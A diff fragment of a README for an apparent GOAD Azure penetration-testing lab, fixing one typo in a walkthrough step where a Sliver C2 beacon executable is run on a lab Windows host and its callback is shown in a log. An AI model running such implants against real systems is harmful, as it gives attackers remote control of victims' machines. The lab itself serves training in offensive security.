deeexcee-io/GOAD-Azure-Pen-Testing-Lab/README.md

 PS C:\Users\samwell.tarly> .\beacon.exe
 ```
-Check back in Sliver and we shpuld have our beacon returned to us
+Check back in Sliver and we should have our beacon returned to us

 ```bash
 [*] Beacon 17150820 beacon - 192.168.56.22:52761 (castelblack) - windows/amd64 - Sat, 25 Nov 2023 11:06:49 UTC